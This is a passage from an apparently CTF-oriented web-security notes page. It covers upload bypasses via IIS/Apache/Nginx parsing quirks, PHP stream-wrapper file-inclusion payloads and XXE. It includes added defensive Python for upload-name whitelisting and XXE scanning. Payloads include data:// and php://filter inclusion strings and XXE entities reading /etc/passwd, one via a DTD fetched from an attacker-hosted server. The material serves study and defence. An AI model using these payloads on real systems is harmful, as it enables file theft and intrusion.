#BABED8"> </span><span style="color: #F78C6C">0x5f</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> 
</span><span style="color: #F78C6C">0x76</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x74</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x5a</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x4c</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xa1</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x3f</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x7a</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xbf</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x30</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x6b</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x88</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x2d</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x60</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x65</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x7d</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x52</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x9d</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> 
</span><span style="color: #F78C6C">0xad</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x88</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xa1</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x66</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x44</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x50</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x33</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">img </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">imagecreatetruecolor</span><span style="color: #89DDFF">(</span><span style="color: #F78C6C">32</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">32</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #89DDFF; font-style: italic">for</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">($</span><span style="color: #BABED8">y </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">y </span><span style="color: 
#89DDFF"><</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">sizeof</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">p</span><span style="color: #89DDFF">);</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">y </span><span style="color: #89DDFF">+=</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">3</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">r </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">p</span><span style="color: #89DDFF">[$</span><span style="color: #BABED8">y</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">g </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">p</span><span style="color: #89DDFF">[$</span><span style="color: #BABED8">y</span><span style="color: #89DDFF">+</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">b </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">p</span><span style="color: #89DDFF">[$</span><span style="color: #BABED8">y</span><span style="color: #89DDFF">+</span><span style="color: #F78C6C">2</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span 
style="color: #BABED8">color </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">imagecolorallocate</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">img</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">r</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">g</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">b</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">imagesetpixel</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">img</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">round</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">y </span><span style="color: #89DDFF">/</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">3</span><span style="color: #89DDFF">),</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">color</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #82AAFF">imagepng</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">img</span><span style="color: #89DDFF">,</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">./1.png</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">);</span></span><span 
class="line"><span style="color: #89DDFF">?></span></span></code></pre></div></li></ul><h3 id="中间件解析漏洞"><a href="#中间件解析漏洞" class="headerlink" title="中间件解析漏洞"></a>中间件解析漏洞</h3><p><a href="https://blog.csdn.net/m0_64378913/article/details/125067293">中间件文件解析漏洞概述及实例——Apache、IIS和Nginx_中间件解析漏洞-CSDN博客</a></p><h4 id="IIS-5-x-6-x"><a href="#IIS-5-x-6-x" class="headerlink" title="IIS 5.x-6.x"></a>IIS 5.x-6.x</h4><ul><li>文件解析: iis6.0下,<strong>分号后面的不被解析</strong>, <code>xx.asp;.jpg</code>被解析为asp</li><li>目录解析: 名字为<code>.asp</code>、<code>.asa</code>的<strong>文件夹</strong>, 其下任何扩展名的文件都被IIS当做<strong>asp文件</strong>来解析并执行</li></ul><h4 id="IIS7-5"><a href="#IIS7-5" class="headerlink" title="IIS7.5"></a>IIS7.5</h4><ul><li>与nginx的类似</li></ul><h4 id="apache"><a href="#apache" class="headerlink" title="apache"></a>apache</h4><h5 id="换行解析"><a href="#换行解析" class="headerlink" title="换行解析"></a>换行解析</h5><ul><li><p>利用前提: 黑名单验证(不能上传php jsp等) version: 2.4.0~2.4.29</p></li><li><p>在解析PHP时,<code>1.php%0A</code>将被按照PHP后缀进行解析(%0a为换行)</p></li></ul><h5 id="多后缀解析"><a href="#多后缀解析" class="headerlink" title="多后缀解析"></a>多后缀解析</h5><ul><li><p>Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令</p></li><li><p>如果添加了如下配置, <code>1.php.png</code>可以当成php解析</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">AddHandler application/x-httpd-php .php</span></span></code></pre></div></li></ul><h4 id="Nginx"><a href="#Nginx" class="headerlink" title="Nginx"></a>Nginx</h4><h5 id="文件名逻辑漏洞"><a href="#文件名逻辑漏洞" class="headerlink" title="文件名逻辑漏洞"></a>文件名逻辑漏洞</h5><ul><li><code>1.gif[0x20][0x00].php</code>Nginx却错误地认为请求的文件是<code>1.gif[0x20]</code></li></ul><h5 id="解析漏洞"><a href="#解析漏洞" class="headerlink" title="解析漏洞"></a>解析漏洞</h5><ul><li>用户配置不当造成漏洞</li><li><code>http://ip/1.png</code>访问图片, <code>http://ip/1.png/.php</code>解析图片为php</li></ul><h3 
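id="filename-checks-vs-parser-quirks"><a href="#filename-checks-vs-parser-quirks" class="headerlink" title="Filename checks versus parser quirks"></a>Filename checks versus parser quirks</h3><p>Every bypass above exploits a gap between what the upload code checks and how the web server later parses the name. The Python below is an added example, not code from the page or from any project it cites: it shows the weak last-dot blacklist next to a whitelist check that normalises the name first, plus the Apache <code>\.php$</code> regex behaviour on a name with a trailing newline. The extension lists and the function names are assumptions made for the demo.</p>

```python
import os
import re
import secrets

# Added example, not code from the page: the last-dot blacklist that the
# middleware quirks defeat, beside a whitelist check that normalises the
# name the way the web server will later parse it. The extension lists
# below are assumptions for the demo.

BLACKLIST = {"php", "php3", "php5", "phtml", "asp", "asa", "aspx", "jsp"}
WHITELIST = {"png", "jpg", "jpeg", "gif"}


def blacklist_check(filename: str) -> bool:
    """The weak check: compare the text after the last dot with a blacklist.
    Returns True when the upload would be accepted."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext not in BLACKLIST


def apache_filesmatch_php(filename: str) -> bool:
    """What an Apache 2.4.0-2.4.29 FilesMatch rule on \\.php$ sees: in PCRE,
    as in Python's re, '$' also matches just before a trailing newline."""
    return re.search(r"\.php$", filename) is not None


def strict_upload_name(filename: str) -> str:
    """Whitelist check; returns the server-chosen on-disk name or raises."""
    # Drop any client-supplied directory part, for either separator.
    base = os.path.basename(filename.replace("\\", "/"))
    # Allow only name.ext from a small safe alphabet with exactly one dot.
    # This rejects the ';' of IIS (x.asp;.jpg), the newline of Apache
    # (x.php\n), the space/NUL of Nginx (x.gif\x20\x00.php) and the second
    # extension of Apache AddHandler (x.php.png) in a single step.
    if not re.fullmatch(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+", base):
        raise ValueError("filename must be name.ext from a safe alphabet")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in WHITELIST:
        raise ValueError(f"extension {ext!r} is not allowed")
    # Never keep the client's name on disk; it only has to carry the extension.
    return f"{secrets.token_hex(8)}.{ext}"


def is_accepted(filename: str) -> bool:
    """Does the strict check accept the name? (wrapper used by the checks)"""
    try:
        strict_upload_name(filename)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for name in ["shell.php\n", "shell.asp;.jpg", "shell.php.png", "photo.PNG"]:
        print(repr(name), "blacklist accepts:", blacklist_check(name),
              "strict accepts:", is_accepted(name))
```

<p>The three attacker names pass <code>blacklist_check</code> and, for the newline case, also match the Apache regex, which is exactly the combination CVE-2017-15715 needs; the strict function rejects all of them and only accepts a plain <code>name.ext</code> with a whitelisted extension, then discards the client-chosen name entirely.</p>
<h3 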
id="编辑器漏洞"><a href="#编辑器漏洞" class="headerlink" title="编辑器漏洞"></a>Rich-text editor vulnerabilities</h3><ul><li><a href="https://blog.csdn.net/weixin_45329947/article/details/122712440">Ueditor, FCKeditor and Kindeditor editor vulnerabilities - CSDN blog</a></li></ul><h2 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>File inclusion</h2><h3 id="思路要点"><a href="#思路要点" class="headerlink" title="思路要点"></a>Approach</h3><h4 id="黑盒-1"><a href="#黑盒-1" class="headerlink" title="黑盒"></a>Black box</h4><ul><li>Look for <strong>request parameters</strong> whose values look like file names or paths, and check whether the value really selects the file that gets loaded</li></ul><h4 id="白盒-1"><a href="#白盒-1" class="headerlink" title="白盒"></a>White box</h4><ol><li>Start from an application feature and follow the code that implements it to the inclusion call</li><li>Search the code base for the language's inclusion functions (in PHP: <code>include</code>, <code>require</code>, <code>include_once</code>, <code>require_once</code>) and audit each call site</li><li>Use <strong>stream wrappers</strong> (PHP pseudo-protocols) to get around the fixes that were applied</li></ol><h3 id="php伪协议"><a href="#php伪协议" class="headerlink" title="php伪协议"></a>PHP pseudo-protocols (stream wrappers)</h3><p><a href="https://segmentfault.com/a/1190000018991087">Summary of PHP pseudo-protocols - SegmentFault 思否</a></p><h4 id="file-协议"><a href="#file-协议" class="headerlink" title="file 协议"></a>file:// wrapper</h4><h5 id="条件-1"><a href="#条件-1" class="headerlink" title="条件"></a>Conditions</h5><ul><li><code>allow_url_fopen</code>: works whether off or on</li><li><code>allow_url_include</code>: works whether off or on</li></ul><h5 id="示例-1"><a href="#示例-1" class="headerlink" title="示例"></a>Examples</h5><ul><li><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line">?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt</span></code></pre></div></li><li><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line">?file=./phpinfo.txt</span></code></pre></div></li></ul><h4 id="php-协议"><a href="#php-协议" class="headerlink" title="php 协议"></a>php:// wrapper</h4><p><strong>Conditions</strong></p><ul><li><code>allow_url_fopen</code>: works whether off or on</li><li><code>allow_url_include</code>: only <code>php://input</code>, <code>php://stdin</code>, <code>php://memory</code> and <code>php://temp</code> need it on</li></ul><table><thead><tr><th>Wrapper</th><th>Purpose</th></tr></thead><tbody><tr><td><strong>php://input</strong></td><td>Read-only stream giving the raw request body; in a POST request it is the <code>data</code> part of the POST. It is not available when <code>enctype="multipart/form-data"</code> is used.</td></tr><tr><td>php://output</td><td>Write-only stream that writes to the output buffer, the same way <code>print</code> and <code>echo</code> do.</td></tr><tr><td>php://fd</td><td>(&gt;=5.3.6) Direct access to a given file descriptor; for example <code>php://fd/3</code> refers to file descriptor 3.</td></tr><tr><td>php://memory php://temp</td><td>(&gt;=5.1.0) File-like streams for reading and writing temporary data. The only difference is that <code>php://memory</code> always keeps the data in memory, while <code>php://temp</code> moves it to a temporary file once it exceeds a predefined limit (default <code>2MB</code>); the temporary file location is chosen the same way as <code>sys_get_temp_dir()</code>.</td></tr><tr><td><strong>php://filter</strong></td><td>(&gt;=5.0.0) A meta-wrapper that applies filters to a stream as it is opened. Useful with the all-in-one file functions such as <code>readfile()</code>, <code>file()</code> and <code>file_get_contents()</code>, where there is no other chance to apply a filter before the content is read.</td></tr></tbody></table><h5 id="php-filter参数详解"><a href="#php-filter参数详解" class="headerlink" title="php://filter参数详解"></a><code>php://filter</code> parameters</h5><table><thead><tr><th>php://filter parameter</th><th>Description</th></tr></thead><tbody><tr><td>resource=&lt;stream to filter&gt;</td><td>Required. The stream to apply the filters to.</td></tr><tr><td>read=&lt;read-chain filters&gt;</td><td>Optional. One or more filter names, separated by the pipe character (<code>|</code>).</td></tr><tr><td>write=&lt;write-chain filters&gt;</td><td>Optional. One or more filter names, separated by <code>|</code>.</td></tr><tr><td>&lt;filters for both chains&gt;</td><td>Any filter list not prefixed with <em>read=</em> or <em>write=</em> is applied to the read or write chain as appropriate.</td></tr></tbody></table><p>Example:</p><p><code>php://filter/read=convert.base64-encode/resource=[filename]</code> reads a file's source; for a PHP file the base64 encoding is what stops <code>include</code> from executing it, so the code comes back as text and can be decoded offline.</p><h4 id="data-协议"><a href="#data-协议" class="headerlink" title="data 协议"></a>data:// wrapper</h4><h5 id="条件-2"><a href="#条件-2" class="headerlink" title="条件"></a>Conditions</h5><ul><li><code>allow_url_fopen</code>: on</li><li><code>allow_url_include</code>: on</li></ul><h5 id="示例-2"><a href="#示例-2" class="headerlink" title="示例"></a>Examples</h5><ul><li><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line">?file=data://text/plain,&lt;?php%20phpinfo();?&gt;</span></code></pre></div></li><li><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line">?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b</span></code></pre></div></li></ul><h4 id="http-https-协议"><a href="#http-https-协议" class="headerlink" title="http &amp; https 协议"></a>http &amp; https wrappers</h4><h5 id="条件-3"><a href="#条件-3" class="headerlink" title="条件"></a>Conditions</h5><ul><li><code>allow_url_fopen</code>: on</li><li><code>allow_url_include</code>: on</li></ul><h5 id="作用"><a href="#作用" class="headerlink" title="作用"></a>Purpose</h5><ul><li>Usually used for remote file inclusion</li></ul><h5 id="示例-3"><a href="#示例-3" class="headerlink" title="示例"></a>Example</h5><ul><li><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line">?file=http://127.0.0.1/phpinfo.txt</span></code></pre></div></li></ul><h3 id="LFI-本地文件包含"><a href="#LFI-本地文件包含" class="headerlink" title="LFI 本地文件包含"></a>LFI (local file inclusion)</h3><ul><li>Through an uploaded file that carries PHP code</li><li>Through log poisoning (a PHP payload in the User-Agent header ends up in the access log) or through the session file, which is then included</li><li>Through stream wrappers combined with encoding and decoding filters</li></ul><h2 id="XXE-–-XML-External-Entity-Injection"><a href="#XXE-–-XML-External-Entity-Injection" class="headerlink" title="XXE – XML External Entity Injection"></a>XXE – XML External Entity Injection</h2><p><a href="https://www.cnblogs.com/20175211lyz/p/11413335.html">CTF XXE - MustaphaMond - 博客园 (cnblogs.com)</a></p><ul><li>XML External Entity injection: the program, while parsing input XML, resolves an external entity that the attacker declared.</li><li>Impact: file reads, probing internal ports (SSRF), and more</li></ul><h3 id="XML"><a href="#XML" class="headerlink" title="XML"></a>XML</h3><h4 id="概念"><a href="#概念" class="headerlink" title="概念"></a>Concept</h4><ul><li><p><code>XML</code> (EXtensible Markup Language) is a markup language with no predefined tags: you define your own. It is a W3C recommendation. The difference from HTML:</p><ul><li>HTML is designed to display data</li><li>XML is designed to carry and store data</li></ul></li><li><p>An XML document consists of:</p><ul><li>the XML declaration</li><li>a DTD (document type definition), optional</li><li>the document element</li></ul></li><li><p>Example:</p><div class="language-xml"><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line">&lt;!--XML declaration--&gt;</span><span class="line">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span><span class="line"></span><span class="line">&lt;!--DTD, optional--&gt;</span><span class="line">&lt;!DOCTYPE foo [</span><span class="line">  &lt;!ELEMENT foo ANY &gt;</span><span class="line">  &lt;!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" &gt;</span><span class="line">]&gt;</span><span class="line"></span><span class="line">&lt;!--document element--&gt;</span><span class="line">&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</span></code></pre></div></li></ul><h4 id="DTD"><a href="#DTD" class="headerlink" title="DTD"></a>DTD</h4><ul><li><p>A document type definition (DTD) states the semantic constraints of an XML document: it defines the legal building blocks (elements, attributes, entities) and the structure a valid document must follow.</p></li><li><p>A DTD can be declared or referenced in two ways:</p><ul><li><p>1. Internal DTD: the declarations of the document's elements, attributes and entities are written inside the XML document itself.</p><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line">&lt;!DOCTYPE note [</span><span class="line">  &lt;!ENTITY a "admin"&gt;</span><span class="line">]&gt;</span><span class="line">&lt;note&gt;&amp;a;&lt;/note&gt;</span><span class="line">&lt;!-- admin --&gt;</span></code></pre></div></li><li><p>2. External DTD: the declarations live in a separate <code>.dtd</code> file that the document references with <code>&lt;!DOCTYPE note SYSTEM "..."&gt;</code>. The snippet below (as given on the page) still uses an internal subset; what is external here is the <em>content of the entity</em>, which the parser fetches from the <code>SYSTEM</code> literal:</p><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line">&lt;!DOCTYPE note [</span><span class="line">  &lt;!ENTITY c SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php"&gt;</span><span class="line">]&gt;</span><span class="line">&lt;note&gt;&amp;c;&lt;/note&gt;</span><span class="line">&lt;!-- Y2w0eV9uZWVkX2FfZ3JpbGZyaWVuZA== --&gt;</span></code></pre></div></li></ul></li><li><p>Ways to declare an entity:</p><ul><li><p>Internal entity</p><div class="language-xml"><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line">&lt;!DOCTYPE note [</span><span class="line">  &lt;!ENTITY a "admin"&gt;</span><span class="line">]&gt;</span><span class="line">&lt;note&gt;&amp;a;&lt;/note&gt;</span><span class="line">&lt;!-- admin --&gt;</span></code></pre></div></li><li><p>Parameter entity (the inner declaration is wrapped in single quotes so the nested double quotes stay valid)</p><div class="language-xml"><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line">&lt;!DOCTYPE note [</span><span class="line">  &lt;!ENTITY % b '&lt;!ENTITY b1 "awsl"&gt;'&gt;</span><span class="line">  %b;</span><span class="line">]&gt;</span><span class="line">&lt;note&gt;&amp;b1;&lt;/note&gt;</span><span class="line">&lt;!-- awsl --&gt;</span></code></pre></div><ul><li>Parameter entities are declared with <code>% name</code> and referenced with <code>%name;</code>; they can be declared only in the DTD and referenced only in the DTD.</li><li>All other (general) entities are declared with <code>name</code> and referenced with <code>&amp;name;</code>; they are declared in the DTD and can be referenced from the document body.</li></ul></li><li><p>External entity</p><div class="language-xml"><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line">&lt;!DOCTYPE note [</span><span class="line">  &lt;!ENTITY c SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php"&gt;</span><span class="line">]&gt;</span><span class="line">&lt;note&gt;&amp;c;&lt;/note&gt;</span><span class="line">&lt;!-- Y2w0eV9uZWVkX2FfZ3JpbGZyaWVuZA== --&gt;</span></code></pre></div><ul><li>External references support protocols such as <code>http</code> and <code>file</code>, and with PHP also the <code>php://</code> wrappers shown above</li></ul></li><li><p>External parameter entity</p><div class="language-xml"><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line">&lt;!DOCTYPE note [</span><span class="line">  &lt;!ENTITY % d SYSTEM "http://47.106.143.26/xml.dtd"&gt;</span><span class="line">  %d;</span><span class="line">]&gt;</span><span class="line">&lt;note&gt;&amp;d1;&lt;/note&gt;</span><span class="line">&lt;!-- Y2w0eV9uZWVkX2FfZ3JpbGZyaWVuZA== --&gt;</span></code></pre></div><p><code>http://47.106.143.26/xml.dtd</code>:</p><div class="language-xml"><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line">&lt;!-- http://47.106.143.26/xml.dtd --&gt;</span><span class="line">&lt;!ENTITY d1 SYSTEM "data://text/plain;base64,Y2w0eV9uZWVkX2FfZ3JpbGZyaWVuZA=="&gt;</span></code></pre></div></li></ul></li></ul><h3 id="XML外部实体注入-XXE"><a href="#XML外部实体注入-XXE" class="headerlink" title="XML外部实体注入(XXE)"></a>XML external entity injection (XXE)</h3><h4 id="漏洞发现"><a href="#漏洞发现" 
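class="headerlink" title="Scanning untrusted XML for entity declarations"></a>Scanning untrusted XML for entity declarations</h4><p>The four entity kinds above differ in exactly the property a defender cares about: whether resolving them reaches outside the document. The Python below is an added example, not code from the page or from any project it cites: it uses the standard library's expat bindings to walk the DTD of an untrusted document and classify every entity declaration before the body is parsed, then wraps ElementTree in a loader that refuses any DOCTYPE. The sample documents are constructed for the demo and the file and URL targets in them are placeholders; the function names are assumptions.</p>

```python
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET

# Added example, not code from the page: classify the entity declarations in
# untrusted XML with expat's DTD callbacks before the body is parsed, and only
# then hand the document to ElementTree. Sample documents are constructed for
# the demo; file and URL targets are placeholders.

# Internal general entity only: no external data is involved.
INTERNAL_ENTITY_DOC = b'<!DOCTYPE note [<!ENTITY a "admin">]><note>&a;</note>'

# External general entity: the classic in-band file read.
FILE_READ_DOC = (b'<?xml version="1.0"?>'
                 b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
                 b'<foo>&xxe;</foo>')

# External parameter entity: pulls an attacker-hosted DTD (out-of-band variant).
OOB_DOC = (b'<!DOCTYPE test ['
           b'<!ENTITY % file SYSTEM "http://vps-ip/hack.dtd">'
           b'%file;'
           b']><test>&hhh;</test>')

PLAIN_DOC = b'<user><name>alice</name></user>'


def scan_xml_for_xxe(data: bytes) -> dict:
    """Walk the DTD with expat and report every declaration that can reach
    outside the document. Nothing is fetched: expat only resolves external
    entities when an ExternalEntityRefHandler is installed, and its default
    XML_PARAM_ENTITY_PARSING_NEVER leaves external DTDs alone."""
    report = {"doctype": None, "external_dtd": None, "findings": []}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        report["doctype"] = name
        if sysid or pubid:
            report["external_dtd"] = sysid or pubid
            report["findings"].append(f"external DTD referenced by DOCTYPE {name}")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter" if is_param else "general"
        if sysid:  # SYSTEM "..." literal: content comes from a file or URL
            report["findings"].append(f"external {kind} entity {name!r} -> {sysid}")
        elif is_param:  # internal parameter entity: builds further DTD text
            report["findings"].append(f"internal parameter entity {name!r}")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except expat.ExpatError:
        pass  # the DTD precedes the body, so findings are complete even if the body fails
    return report


def load_untrusted(data: bytes):
    """Conservative loader for external input: refuse any DOCTYPE at all
    (internal entities alone still allow expansion attacks), then parse
    with ElementTree and return the root element."""
    if scan_xml_for_xxe(data)["doctype"] is not None:
        raise ValueError("DOCTYPE is not allowed in untrusted XML")
    return ET.fromstring(data)


def is_safe_to_parse(data: bytes) -> bool:
    """Does the loader accept the document? (wrapper used by the checks)"""
    try:
        load_untrusted(data)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for label, doc in [("internal", INTERNAL_ENTITY_DOC), ("file read", FILE_READ_DOC),
                       ("oob", OOB_DOC), ("plain", PLAIN_DOC)]:
        print(label, scan_xml_for_xxe(doc), "accepted:", is_safe_to_parse(doc))
```

<p>Run <code>scan_xml_for_xxe</code> on the raw request body before deserialising and log its findings as a detection signal; the in-band file read shows up as an external general entity, the out-of-band variant as an external parameter entity, and the harmless internal entity produces no finding but is still refused by <code>load_untrusted</code>, which should be the only parser entry point for input from outside.</p>
<h4 id="漏洞发现-2"><a href="#漏洞发现-2" 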
class="headerlink" title="漏洞发现"></a>Finding the vulnerability</h4><h5 id="黑盒-2"><a href="#黑盒-2" class="headerlink" title="黑盒"></a>Black box</h5><ul><li>When the Content-Type, or the data itself, is XML, send XML payloads and test</li><li>Whatever the declared Content-Type or transport format, it is worth switching the body to XML and resubmitting; some back ends parse it anyway</li><li>XXE is not only a data-in-transit problem: when an uploaded file is parsed by a plugin or rendered for preview, an XXE payload inside the file is processed too (office documents and SVG are XML underneath)</li></ul><h5 id="白盒-2"><a href="#白盒-2" class="headerlink" title="白盒"></a>White box</h5><ul><li><p>Start from an application feature and follow the code to the XML parser call</p></li><li><p>Search the code base for the language's XML parsing functions and audit each call site</p></li><li><p>Use stream wrappers (pseudo-protocols) to get around the fixes that were applied</p></li></ul><h4 id="任意文件读取"><a href="#任意文件读取" class="headerlink" title="任意文件读取"></a>Arbitrary file read</h4><h5 id="有回显"><a href="#有回显" class="headerlink" title="有回显"></a>With output (in-band)</h5><ul><li><p>Read a file on the target directly</p><div class="language-xml"><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line">&lt;?xml version="1.0" encoding="UTF-8" ?&gt;</span><span class="line">&lt;!DOCTYPE foo [</span><span class="line">  &lt;!ENTITY rabbit SYSTEM "file:///flag" &gt;</span><span class="line">]&gt;</span><span class="line">&lt;user&gt;&lt;username&gt;&amp;rabbit;&lt;/username&gt;&lt;password&gt;123&lt;/password&gt;&lt;/user&gt;</span></code></pre></div></li><li><p>Pull in a malicious external parameter entity (the DTD is hosted on the attacker's server)</p><div class="language-xml"><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line">&lt;?xml version="1.0" ?&gt;</span><span class="line">&lt;!DOCTYPE test [</span><span class="line">  &lt;!ENTITY % file SYSTEM "http://vps-ip/hack.dtd"&gt;</span><span class="line">  %file;</span><span class="line">]&gt;</span><span class="line">&lt;test&gt;&amp;hhh;&lt;/test&gt;</span></code></pre></div><p>hack.dtd:</p><div class="language-xml"><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line">&lt;!ENTITY hhh SYSTEM 'file:///etc/passwd'&gt;</span></code></pre></div></li></ul><h5 id="无回显"><a href="#无回显" 